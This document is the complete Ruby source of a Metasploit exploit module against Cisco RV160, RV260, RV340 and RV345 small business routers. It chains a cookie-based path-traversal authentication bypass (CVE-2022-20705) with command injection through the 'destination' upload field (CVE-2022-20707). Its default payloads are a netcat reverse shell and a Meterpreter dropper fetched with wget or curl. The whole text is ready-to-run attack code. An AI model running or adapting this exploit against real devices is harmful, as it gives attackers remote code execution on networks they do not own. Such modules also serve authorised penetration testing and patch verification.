Cisco RV Series Authentication Bypass / Command Injection

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
prepend Msf::Exploit::Remote::AutoCheck  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::CmdStager  
include Msf::Exploit::FileDropper  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Cisco RV Series Authentication Bypass and Command Injection',  
'Description' => %q{  
This module exploits two vulnerabilities, a session ID directory traversal authentication  
bypass (CVE-2022-20705) and a command injection vulnerability (CVE-2022-20707), on Cisco RV160, RV260, RV340,  
and RV345 Small Business Routers, allowing attackers to execute arbitrary commands with www-data user privileges.  
This access can then be used to pivot to other parts of the network. This module works on firmware  
versions 1.0.03.24 and below.  
},  
'License' => MSF_LICENSE,  
'Platform' => ['linux', 'unix'],  
'Author' => [  
'Biem Pham', # Vulnerability Discoveries  
'Neterum', # Metasploit Module  
'jbaines-r7' # Inspired from cisco_rv_series_authbypass_and_rce.rb  
],  
'DisclosureDate' => '2021-11-02',  
'Arch' => [ARCH_CMD, ARCH_ARMLE],  
'References' => [  
['CVE', '2022-20705'], # Authentication Bypass  
['CVE', '2022-20707'], # Command Injection  
['ZDI', '22-410'], # Authentication Bypass  
['ZDI', '22-411'] # Command Injection  
],  
'Targets' => [  
[  
'Unix Command',  
{  
'Platform' => 'unix',  
'Arch' => ARCH_CMD,  
'Type' => :unix_cmd,  
'Payload' => {  
'BadChars' => '\'#'  
},  
'DefaultOptions' => {  
'PAYLOAD' => 'cmd/unix/reverse_netcat'  
}  
}  
],  
[  
'Linux Dropper',  
{  
'Platform' => 'linux',  
'Arch' => [ARCH_ARMLE],  
'Type' => :linux_dropper,  
'Payload' => {  
'BadChars' => '\'#'  
},  
'CmdStagerFlavor' => [ 'wget', 'curl' ],  
'DefaultOptions' => {  
'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp'  
}  
}  
]  
],  
'DefaultTarget' => 0,  
'DefaultOptions' => {  
'RPORT' => 443,  
'SSL' => true,  
'MeterpreterTryToFork' => true  
},  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]  
}  
)  
)  
register_options(  
[  
OptString.new('TARGETURI', [true, 'Base path', '/'])  
]  
)  
end  
  
# sessionid utilized later needs to be set to length  
# of 16 or exploit will fail. Tested with lengths  
# 14-17  
def generate_session_id  
return Rex::Text.rand_text_alphanumeric(16)  
end  
  
def check  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => '/upload',  
'headers' => {  
'Cookie' => 'sessionid =../../www/index.html; sessionid=' + generate_session_id  
}  
}, 10)  
  
# A proper "upload" will trigger file creation. So the send_request_cgi call  
# above is an incorrect "upload" call to avoid creating a file on disk. The router will return  
# status code 405 Not Allowed if authentication has been bypassed by the above request.  
# The firmware containing this authentication bypass also contains the command injection  
# vulnerability that will be abused during actual exploitation. Non-vulnerable  
# firmware versions will respond with 403 Forbidden.  
if res.nil?  
return CheckCode::Unknown('The device did not respond to request packet.')  
elsif res.code == 405  
return CheckCode::Appears('The device is vulnerable to authentication bypass. Likely also vulnerable to command injection.')  
elsif res.code == 403  
return CheckCode::Safe('The device is not vulnerable to exploitation.')  
else # Catch-all  
return CheckCode::Unknown('The target responded in an unexpected way. Exploitation is unlikely.')  
end  
end  
  
def execute_command(cmd, _opts = {})  
res = send_exploit(cmd)  
  
# Successful unix_cmd shells should not produce a response.  
# However if a response is returned, check the status code and return  
# Failure::NotVulnerable if it is 403 Forbidden.  
if target['Type'] == :unix_cmd && res&.code == 403  
fail_with(Failure::NotVulnerable, 'The target responded with 403 Forbidden and is not vulnerable')  
end  
  
if target['Type'] == :linux_dropper  
fail_with(Failure::Unreachable, 'The target did not respond') unless res  
fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200  
begin  
body_json = res.get_json_document  
fail_with(Failure::UnexpectedReply, 'The target did not respond with a JSON body') unless body_json  
rescue JSON::ParserError => e  
print_error("Failed: #{e.class} - #{e.message}")  
fail_with(Failure::UnexpectedReply, 'Failed to parse the response returned from the server! Its possible the response may not be JSON!')  
end  
end  
  
print_good('Exploit successfully executed.')  
end  
  
def send_exploit(cmd)  
filename = Rex::Text.rand_text_alphanumeric(5..12)  
fileparam = Rex::Text.rand_text_alphanumeric(5..12)  
input = Rex::Text.rand_text_alphanumeric(5..12)  
  
# sessionid utilized later needs to be set to length  
# of 16 or exploit will fail. Tested with lengths  
# 14-17  
sessionid = Rex::Text.rand_text_alphanumeric(16)  
  
filepath = '/tmp/upload.input' # This file must exist and be writeable by www-data so we just use the temporary upload file to prevent issues.  
pathparam = 'Configuration'  
  
destination = "'; " + cmd + ' #'  
  
multipart_form = Rex::MIME::Message.new  
multipart_form.add_part(filepath, nil, nil, 'form-data; name="file.path"')  
multipart_form.add_part(filename, nil, nil, 'form-data; name="filename"')  
multipart_form.add_part(pathparam, nil, nil, 'form-data; name="pathparam"')  
multipart_form.add_part(fileparam, nil, nil, 'form-data; name="fileparam"')  
multipart_form.add_part(destination, nil, nil, 'form-data; name="destination"')  
multipart_form.add_part(input, 'application/octet-stream', nil, format('form-data; name="input"; filename="%<filename>s"', filename: filename))  
  
# Escaping "/tmp/upload/" folder that does not contain any other permanent files  
send_request_cgi({  
'method' => 'POST',  
'uri' => '/upload',  
'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",  
'headers' => {  
'Cookie' => 'sessionid =../../www/index.html; sessionid=' + sessionid  
},  
'data' => multipart_form.to_s  
}, 10)  
end  
  
def exploit  
print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")  
case target['Type']  
when :unix_cmd  
execute_command(payload.encoded)  
when :linux_dropper  
execute_cmdstager(linemax: 120)  
end  
end  
end  
`